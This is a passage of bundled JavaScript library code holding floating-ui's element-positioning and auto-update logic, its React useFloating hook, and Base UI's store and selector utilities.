      reference: getRectRelativeToOffsetParent(data.reference, await getOffsetParentFn(data.floating), data.strategy),
      floating: {
        x: 0,
        y: 0,
        width: floatingDimensions.width,
        height: floatingDimensions.height
      }
    };
  };
  function isRTL(element) {
    return getComputedStyle2(element).direction === "rtl";
  }
  var platform2 = {
    convertOffsetParentRelativeRectToViewportRelativeRect,
    getDocumentElement,
    getClippingRect,
    getOffsetParent,
    getElementRects,
    getClientRects,
    getDimensions,
    getScale,
    isElement,
    isRTL
  };
  function rectsAreEqual(a, b) {
    return a.x === b.x && a.y === b.y && a.width === b.width && a.height === b.height;
  }
  function observeMove(element, onMove) {
    let io = null;
    let timeoutId;
    const root = getDocumentElement(element);
    function cleanup() {
      var _io;
      clearTimeout(timeoutId);
      (_io = io) == null || _io.disconnect();
      io = null;
    }
    function refresh(skip, threshold) {
      if (skip === void 0) {
        skip = false;
      }
      if (threshold === void 0) {
        threshold = 1;
      }
      cleanup();
      const elementRectForRootMargin = element.getBoundingClientRect();
      const {
        left,
        top,
        width,
        height
      } = elementRectForRootMargin;
      if (!skip) {
        onMove();
      }
      if (!width || !height) {
        return;
      }
      const insetTop = floor(top);
      const insetRight = floor(root.clientWidth - (left + width));
      const insetBottom = floor(root.clientHeight - (top + height));
      const insetLeft = floor(left);
      const rootMargin = -insetTop + "px " + -insetRight + "px " + -insetBottom + "px " + -insetLeft + "px";
      const options = {
        rootMargin,
        threshold: max(0, min(1, threshold)) || 1
      };
      let isFirstUpdate = true;
      function handleObserve(entries) {
        const ratio = entries[0].intersectionRatio;
        if (ratio !== threshold) {
          if (!isFirstUpdate) {
            return refresh();
          }
          if (!ratio) {
            timeoutId = setTimeout(() => {
              refresh(false, 1e-7);
            }, 1e3);
          } else {
            refresh(false, ratio);
          }
        }
        if (ratio === 1 && !rectsAreEqual(elementRectForRootMargin, element.getBoundingClientRect())) {
          refresh();
        }
        isFirstUpdate = false;
      }
      try {
        io = new IntersectionObserver(handleObserve, {
          ...options,
          // Handle <iframe>s
          root: root.ownerDocument
        });
      } catch (_e) {
        io = new IntersectionObserver(handleObserve, options);
      }
      io.observe(element);
    }
    refresh(true);
    return cleanup;
  }
  function autoUpdate(reference, floating, update2, options) {
    if (options === void 0) {
      options = {};
    }
    const {
      ancestorScroll = true,
      ancestorResize = true,
      elementResize = typeof ResizeObserver === "function",
      layoutShift = typeof IntersectionObserver === "function",
      animationFrame = false
    } = options;
    const referenceEl = unwrapElement(reference);
    const ancestors = ancestorScroll || ancestorResize ? [...referenceEl ? getOverflowAncestors(referenceEl) : [], ...floating ? getOverflowAncestors(floating) : []] : [];
    ancestors.forEach((ancestor) => {
      ancestorScroll && ancestor.addEventListener("scroll", update2, {
        passive: true
      });
      ancestorResize && ancestor.addEventListener("resize", update2);
    });
    const cleanupIo = referenceEl && layoutShift ? observeMove(referenceEl, update2) : null;
    let reobserveFrame = -1;
    let resizeObserver = null;
    if (elementResize) {
      resizeObserver = new ResizeObserver((_ref) => {
        let [firstEntry] = _ref;
        if (firstEntry && firstEntry.target === referenceEl && resizeObserver && floating) {
          resizeObserver.unobserve(floating);
          cancelAnimationFrame(reobserveFrame);
          reobserveFrame = requestAnimationFrame(() => {
            var _resizeObserver;
            (_resizeObserver = resizeObserver) == null || _resizeObserver.observe(floating);
          });
        }
        update2();
      });
      if (referenceEl && !animationFrame) {
        resizeObserver.observe(referenceEl);
      }
      if (floating) {
        resizeObserver.observe(floating);
      }
    }
    let frameId;
    let prevRefRect = animationFrame ? getBoundingClientRect(reference) : null;
    if (animationFrame) {
      frameLoop();
    }
    function frameLoop() {
      const nextRefRect = getBoundingClientRect(reference);
      if (prevRefRect && !rectsAreEqual(prevRefRect, nextRefRect)) {
        update2();
      }
      prevRefRect = nextRefRect;
      frameId = requestAnimationFrame(frameLoop);
    }
    update2();
    return () => {
      var _resizeObserver2;
      ancestors.forEach((ancestor) => {
        ancestorScroll && ancestor.removeEventListener("scroll", update2);
        ancestorResize && ancestor.removeEventListener("resize", update2);
      });
      cleanupIo == null || cleanupIo();
      (_resizeObserver2 = resizeObserver) == null || _resizeObserver2.disconnect();
      resizeObserver = null;
      if (animationFrame) {
        cancelAnimationFrame(frameId);
      }
    };
  }
  var offset2 = offset;
  var shift2 = shift;
  var flip2 = flip;
  var size2 = size;
  var hide2 = hide;
  var limitShift2 = limitShift;
  var computePosition2 = (reference, floating, options) => {
    const cache = /* @__PURE__ */ new Map();
    const mergedOptions = {
      platform: platform2,
      ...options
    };
    const platformWithCache = {
      ...mergedOptions.platform,
      _c: cache
    };
    return computePosition(reference, floating, {
      ...mergedOptions,
      platform: platformWithCache
    });
  };

  // node_modules/@floating-ui/react-dom/dist/floating-ui.react-dom.mjs
  var React19 = __toESM(require_react(), 1);
  var import_react2 = __toESM(require_react(), 1);
  var ReactDOM3 = __toESM(require_react_dom(), 1);
  var isClient = typeof document !== "undefined";
  var noop2 = function noop3() {
  };
  var index = isClient ? import_react2.useLayoutEffect : noop2;
  function deepEqual(a, b) {
    if (a === b) {
      return true;
    }
    if (typeof a !== typeof b) {
      return false;
    }
    if (typeof a === "function" && a.toString() === b.toString()) {
      return true;
    }
    let length;
    let i;
    let keys;
    if (a && b && typeof a === "object") {
      if (Array.isArray(a)) {
        length = a.length;
        if (length !== b.length) return false;
        for (i = length; i-- !== 0; ) {
          if (!deepEqual(a[i], b[i])) {
            return false;
          }
        }
        return true;
      }
      keys = Object.keys(a);
      length = keys.length;
      if (length !== Object.keys(b).length) {
        return false;
      }
      for (i = length; i-- !== 0; ) {
        if (!{}.hasOwnProperty.call(b, keys[i])) {
          return false;
        }
      }
      for (i = length; i-- !== 0; ) {
        const key = keys[i];
        if (key === "_owner" && a.$$typeof) {
          continue;
        }
        if (!deepEqual(a[key], b[key])) {
          return false;
        }
      }
      return true;
    }
    return a !== a && b !== b;
  }
  function getDPR(element) {
    if (typeof window === "undefined") {
      return 1;
    }
    const win = element.ownerDocument.defaultView || window;
    return win.devicePixelRatio || 1;
  }
  function roundByDPR(element, value) {
    const dpr = getDPR(element);
    return Math.round(value * dpr) / dpr;
  }
  function useLatestRef(value) {
    const ref = React19.useRef(value);
    index(() => {
      ref.current = value;
    });
    return ref;
  }
  function useFloating(options) {
    if (options === void 0) {
      options = {};
    }
    const {
      placement = "bottom",
      strategy = "absolute",
      middleware = [],
      platform: platform3,
      elements: {
        reference: externalReference,
        floating: externalFloating
      } = {},
      transform = true,
      whileElementsMounted,
      open
    } = options;
    const [data, setData] = React19.useState({
      x: 0,
      y: 0,
      strategy,
      placement,
      middlewareData: {},
      isPositioned: false
    });
    const [latestMiddleware, setLatestMiddleware] = React19.useState(middleware);
    if (!deepEqual(latestMiddleware, middleware)) {
      setLatestMiddleware(middleware);
    }
    const [_reference, _setReference] = React19.useState(null);
    const [_floating, _setFloating] = React19.useState(null);
    const setReference = React19.useCallback((node) => {
      if (node !== referenceRef.current) {
        referenceRef.current = node;
        _setReference(node);
      }
    }, []);
    const setFloating = React19.useCallback((node) => {
      if (node !== floatingRef.current) {
        floatingRef.current = node;
        _setFloating(node);
      }
    }, []);
    const referenceEl = externalReference || _reference;
    const floatingEl = externalFloating || _floating;
    const referenceRef = React19.useRef(null);
    const floatingRef = React19.useRef(null);
    const dataRef = React19.useRef(data);
    const hasWhileElementsMounted = whileElementsMounted != null;
    const whileElementsMountedRef = useLatestRef(whileElementsMounted);
    const platformRef = useLatestRef(platform3);
    const openRef = useLatestRef(open);
    const update2 = React19.useCallback(() => {
      if (!referenceRef.current || !floatingRef.current) {
        return;
      }
      const config = {
        placement,
        strategy,
        middleware: latestMiddleware
      };
      if (platformRef.current) {
        config.platform = platformRef.current;
      }
      computePosition2(referenceRef.current, floatingRef.current, config).then((data2) => {
        const fullData = {
          ...data2,
          // The floating element's position may be recomputed while it's closed
          // but still mounted (such as when transitioning out). To ensure
          // `isPositioned` will be `false` initially on the next open, avoid
          // setting it to `true` when `open === false` (must be specified).
          isPositioned: openRef.current !== false
        };
        if (isMountedRef.current && !deepEqual(dataRef.current, fullData)) {
          dataRef.current = fullData;
          ReactDOM3.flushSync(() => {
            setData(fullData);
          });
        }
      });
    }, [latestMiddleware, placement, strategy, platformRef, openRef]);
    index(() => {
      if (open === false && dataRef.current.isPositioned) {
        dataRef.current.isPositioned = false;
        setData((data2) => ({
          ...data2,
          isPositioned: false
        }));
      }
    }, [open]);
    const isMountedRef = React19.useRef(false);
    index(() => {
      isMountedRef.current = true;
      return () => {
        isMountedRef.current = false;
      };
    }, []);
    index(() => {
      if (referenceEl) referenceRef.current = referenceEl;
      if (floatingEl) floatingRef.current = floatingEl;
      if (referenceEl && floatingEl) {
        if (whileElementsMountedRef.current) {
          return whileElementsMountedRef.current(referenceEl, floatingEl, update2);
        }
        update2();
      }
    }, [referenceEl, floatingEl, update2, whileElementsMountedRef, hasWhileElementsMounted]);
    const refs = React19.useMemo(() => ({
      reference: referenceRef,
      floating: floatingRef,
      setReference,
      setFloating
    }), [setReference, setFloating]);
    const elements = React19.useMemo(() => ({
      reference: referenceEl,
      floating: floatingEl
    }), [referenceEl, floatingEl]);
    const floatingStyles = React19.useMemo(() => {
      const initialStyles = {
        position: strategy,
        left: 0,
        top: 0
      };
      if (!elements.floating) {
        return initialStyles;
      }
      const x = roundByDPR(elements.floating, data.x);
      const y = roundByDPR(elements.floating, data.y);
      if (transform) {
        return {
          ...initialStyles,
          transform: "translate(" + x + "px, " + y + "px)",
          ...getDPR(elements.floating) >= 1.5 && {
            willChange: "transform"
          }
        };
      }
      return {
        position: strategy,
        left: x,
        top: y
      };
    }, [strategy, transform, elements.floating, data.x, data.y]);
    return React19.useMemo(() => ({
      ...data,
      update: update2,
      refs,
      elements,
      floatingStyles
    }), [data, update2, refs, elements, floatingStyles]);
  }
  var offset3 = (options, deps) => {
    const result = offset2(options);
    return {
      name: result.name,
      fn: result.fn,
      options: [options, deps]
    };
  };
  var shift3 = (options, deps) => {
    const result = shift2(options);
    return {
      name: result.name,
      fn: result.fn,
      options: [options, deps]
    };
  };
  var limitShift3 = (options, deps) => {
    const result = limitShift2(options);
    return {
      fn: result.fn,
      options: [options, deps]
    };
  };
  var flip3 = (options, deps) => {
    const result = flip2(options);
    return {
      name: result.name,
      fn: result.fn,
      options: [options, deps]
    };
  };
  var size3 = (options, deps) => {
    const result = size2(options);
    return {
      name: result.name,
      fn: result.fn,
      options: [options, deps]
    };
  };
  var hide3 = (options, deps) => {
    const result = hide2(options);
    return {
      name: result.name,
      fn: result.fn,
      options: [options, deps]
    };
  };

  // node_modules/@base-ui/react/utils/popups/popupStoreUtils.mjs
  var React24 = __toESM(require_react(), 1);
  var ReactDOM4 = __toESM(require_react_dom(), 1);

  // node_modules/@base-ui/react/floating-ui-react/hooks/useSyncedFloatingRootContext.mjs
  var React23 = __toESM(require_react(), 1);

  // node_modules/@base-ui/utils/store/createSelector.mjs
  var createSelector = (a, b, c, d, e, f, ...other) => {
    if (other.length > 0) {
      throw new Error(true ? "Unsupported number of selectors" : formatErrorMessage_default(1));
    }
    let selector;
    if (a && b && c && d && e && f) {
      selector = (state, a1, a2, a3) => {
        const va = a(state, a1, a2, a3);
        const vb = b(state, a1, a2, a3);
        const vc = c(state, a1, a2, a3);
        const vd = d(state, a1, a2, a3);
        const ve = e(state, a1, a2, a3);
        return f(va, vb, vc, vd, ve, a1, a2, a3);
      };
    } else if (a && b && c && d && e) {
      selector = (state, a1, a2, a3) => {
        const va = a(state, a1, a2, a3);
        const vb = b(state, a1, a2, a3);
        const vc = c(state, a1, a2, a3);
        const vd = d(state, a1, a2, a3);
        return e(va, vb, vc, vd, a1, a2, a3);
      };
    } else if (a && b && c && d) {
      selector = (state, a1, a2, a3) => {
        const va = a(state, a1, a2, a3);
        const vb = b(state, a1, a2, a3);
        const vc = c(state, a1, a2, a3);
        return d(va, vb, vc, a1, a2, a3);
      };
    } else if (a && b && c) {
      selector = (state, a1, a2, a3) => {
        const va = a(state, a1, a2, a3);
        const vb = b(state, a1, a2, a3);
        return c(va, vb, a1, a2, a3);
      };
    } else if (a && b) {
      selector = (state, a1, a2, a3) => {
        const va = a(state, a1, a2, a3);
        return b(va, a1, a2, a3);
      };
    } else if (a) {
      selector = a;
    } else {
      throw (
        /* minify-error-disabled */
        new Error("Missing arguments")
      );
    }
    return selector;
  };

  // node_modules/@base-ui/utils/store/useStore.mjs
  var React21 = __toESM(require_react(), 1);
  var import_shim = __toESM(require_shim(), 1);
  var import_with_selector = __toESM(require_with_selector(), 1);

  // node_modules/@base-ui/utils/fastHooks.mjs
  var React20 = __toESM(require_react(), 1);
  var hooks = [];
  var currentInstance = void 0;
  function getInstance() {
    return currentInstance;
  }
  function register(hook) {
    hooks.push(hook);
  }
  function fastComponent(fn) {
    const FastComponent = (props, forwardedRef) => {
      const instance = useRefWithInit(createInstance).current;
      let result;
      try {
        currentInstance = instance;
        for (const hook of hooks) {
          hook.before(instance);
        }
        result = fn(props, forwardedRef);
        for (const hook of hooks) {
          hook.after(instance);
        }
        instance.didInitialize = true;
      } finally {
        currentInstance = void 0;
      }
      return result;
    };
    FastComponent.displayName = fn.displayName || fn.name;
    return FastComponent;
  }
  function fastComponentRef(fn) {
    return /* @__PURE__ */ React20.forwardRef(fastComponent(fn));
  }
  function createInstance() {
    return {
      didInitialize: false
    };
  }

  // node_modules/@base-ui/utils/store/useStore.mjs
  var canUseRawUseSyncExternalStore = isReactVersionAtLeast(19);
  var useStoreImplementation = canUseRawUseSyncExternalStore ? useStoreFast : useStoreLegacy;
  function useStore(store2, selector, a1, a2, a3) {
    return useStoreImplementation(store2, selector, a1, a2, a3);
  }
  function useStoreR19(store2, selector, a1, a2, a3) {
    const getSelection = React21.useCallback(() => selector(store2.getSnapshot(), a1, a2, a3), [store2, selector, a1, a2, a3]);
    return (0, import_shim.useSyncExternalStore)(store2.subscribe, getSelection, getSelection);
  }
  register({
    before(instance) {
      instance.syncIndex = 0;
      if (!instance.didInitialize) {
        instance.syncTick = 1;
        instance.syncHooks = [];
        instance.didChangeStore = true;
        instance.getSnapshot = () => {
          let didChange2 = false;
          for (let i = 0; i < instance.syncHooks.length; i += 1) {
            const hook = instance.syncHooks[i];
            const value = hook.selector(hook.store.state, hook.a1, hook.a2, hook.a3);
            if (!Object.is(hook.value, value)) {
              didChange2 = true;
              hook.value = value;
            }
          }
          if (didChange2) {
            instance.syncTick += 1;
          }
          return instance.syncTick;
        };
      }
    },
    after(instance) {
      if (instance.syncHooks.length > 0) {
        if (instance.didChangeStore) {
          instance.didChangeStore = false;
          instance.subscribe = (onStoreChange) => {
            const stores = /* @__PURE__ */ new Set();
            for (const hook of instance.syncHooks) {
              stores.add(hook.store);
            }
            const unsubscribes = [];
            for (const store2 of stores) {
              unsubscribes.push(store2.subscribe(onStoreChange));
            }
            return () => {
              for (const unsubscribe of unsubscribes) {
                unsubscribe();
              }
            };
          };
        }
        (0, import_shim.useSyncExternalStore)(instance.subscribe, instance.getSnapshot, instance.getSnapshot);
      }
    }
  });
  function useStoreFast(store2, selector, a1, a2, a3) {
    const instance = getInstance();
    if (!instance) {
      return useStoreR19(store2, selector, a1, a2, a3);
    }
    const index2 = instance.syncIndex;
    instance.syncIndex += 1;
    let hook;
    if (!instance.didInitialize) {
      hook = {
        store: store2,
        selector,
        a1,
        a2,
        a3,
        value: selector(store2.getSnapshot(), a1, a2, a3)
      };
      instance.syncHooks.push(hook);
    } else {
      hook = instance.syncHooks[index2];
      if (hook.store !== store2 || hook.selector !== selector || !Object.is(hook.a1, a1) || !Object.is(hook.a2, a2) || !Object.is(hook.a3, a3)) {
        if (hook.store !== store2) {
          instance.didChangeStore = true;
        }
        hook.store = store2;
        hook.selector = selector;
        hook.a1 = a1;
        hook.a2 = a2;
        hook.a3 = a3;
        hook.value = selector(store2.getSnapshot(), a1, a2, a3);
      }
    }
    return hook.value;
  }
  function useStoreLegacy(store2, selector, a1, a2, a3) {
    return (0, import_with_selector.useSyncExternalStoreWithSelector)(store2.subscribe, store2.getSnapshot, store2.getSnapshot, (state) => selector(state, a1, a2, a3));
  }

  // node_modules/@base-ui/utils/store/Store.mjs
  var Store = class {
    /**
     * The current state of the store.
     * This property is updated immediately when the state changes as a result of calling {@link setState}, {@link update}, or {@link set}.
     * To subscribe to state changes, use the {@link useState} method. The value returned by {@link useState} is updated after the component renders (similarly to React's useState).
     * The values can be used directly (to avoid subscribing to the store) in effects or event handlers.
     *
     * Do not modify properties in state directly. Instead, use the provided methods to ensure proper state management and listener notification.
     */
    // Internal state to handle recursive `setState()` calls
    constructor(state) {
      this.state = state;
      this.listeners = /* @__PURE__ */ new Set();
      this.updateTick = 0;
    }
    /**
     * Registers a listener that will be called whenever the store's state changes.
     *
     * @param fn The listener function to be called on state changes.
     * @returns A function to unsubscribe the listener.
     */
    subscribe = (fn) => {
      this.listeners.add(fn);
      return () => {
        this.listeners.delete(fn);
      };
    };
    /**
     * Returns the current state of the store.
     */
    getSnapshot = () => {
      return this.state;
    };
    /**
     * Updates the entire store's state and notifies all registered listeners.
     *
     * @param newState The new state to set for the store.
     */
    setState(newState) {
      if (this.state === newState) {
        return;
      }
      this.state = newState;
      this.updateTick += 1;
      const currentTick = this.updateTick;
      for (const listener of this.listeners) {
        if (currentTick !== this.updateTick) {
          return;
        }
        listener(newState);
      }
    }
    /**
     * Merges the provided changes into the current state and notifies listeners if there are changes.
     *
     * @param changes An object containing the changes to apply to the current state.
     */
    update(changes) {
      for (const key in changes) {
        if (!Object.is(this.state[key], changes[key])) {
          this.setState({
            ...this.state,
            ...changes
          });
          return;
        }
      }
    }
    /**
     * Sets a specific key in the store's state to a new value and notifies listeners if the value has changed.
     *
     * @param key The key in the store's state to update.
     * @param value The new value to set for the specified key.
     */
    set(key, value) {
      if (!Object.is(this.state[key], value)) {
        this.setState({
          ...this.state,
          [key]: value
        });
      }
    }
    /**
     * Gives the state a new reference and updates all registered listeners.
     */
    notifyAll() {
      const newState = {
        ...this.state
      };
      this.setState(newState);
    }
    use(selector, a1, a2, a3) {
      return useStore(this, selector, a1, a2, a3);
    }
  };

  // node_modules/@base-ui/utils/store/ReactStore.mjs
  var React22 = __toESM(require_react(), 1);
  var ReactStore = class extends Store {
    /**
     * Creates a new ReactStore instance.
     *
     * @param state Initial state of the store.
     * @param context Non-reactive context values.
     * @param selectors Optional selectors for use with `useState`.
     */
    constructor(state, context = {}, selectors3) {
      super(state);
      this.context = context;
      this.selectors = selectors3;
    }
    /**
     * Non-reactive values such as refs, callbacks, etc.
     */
    /**
     * Synchronizes a single external value into the store.
     *
     * Note that the while the value in `state` is updated immediately, the value returned
     * by `useState` is updated before the next render (similarly to React's `useState`).
     */
    useSyncedValue(key, value) {
      React22.useDebugValue(key);
      const store2 = this;
      useIsoLayoutEffect(() => {
        if (store2.state[key] !== value) {
          store2.set(key, value);
        }
      }, [store2, key, value]);
    }
    /**
     * Synchronizes a single external value into the store and
     * cleans it up (sets to `undefined`) on unmount.
     *
     * Note that the while the value in `state` is updated immediately, the value returned
     * by `useState` is updated before the next render (similarly to React's `useState`).
     */
    useSyncedValueWithCleanup(key, value) {
      const store2 = this;
      useIsoLayoutEffect(() => {
        if (store2.state[key] !== value) {
          store2.set(key, value);
        }
        return () => {
          store2.set(key, void 0);
        };
      }, [store2, key, value]);
    }
    /**
     * Synchronizes multiple external values into the store.
     *
     * Note that the while the values in `state` are updated immediately, the values returned
     * by `useState` are updated before the next render (similarly to React's `useState`).
     */
    useSyncedValues(statePart) {
      const store2 = this;
      if (true) {
        React22.useDebugValue(statePart, (p) => Object.keys(p));
        const keys = React22.useRef(Object.keys(statePart)).current;
        const nextKeys = Object.keys(statePart);
        if (keys.length !== nextKeys.length || keys.some((key, index2) => key !== nextKeys[index2])) {
          console.error("ReactStore.useSyncedValues expects the same prop keys on every render. Keys should be stable.");
        }
      }
      const dependencies = Object.values(statePart);
      useIsoLayoutEffect(() => {
        store2.update(statePart);
      }, [store2, ...dependencies]);
    }
    /**
     * Registers a controllable prop pair (`controlled`, `defaultValue`) for a specific key. If `controlled`
     * is non-undefined, the store's state at `key` is updated to match `controlled`.
     */
    useControlledProp(key, controlled) {
      React22.useDebugValue(key);
      const store2 = this;
      const isControlled = controlled !== void 0;
      useIsoLayoutEffect(() => {
        if (isControlled && !Object.is(store2.state[key], controlled)) {
          store2.setState({
            ...store2.state,
            [key]: controlled
          });
        }
      }, [store2, key, controlled, isControlled]);
      if (true) {
        const cache = this.controlledValues ??= /* @__PURE__ 

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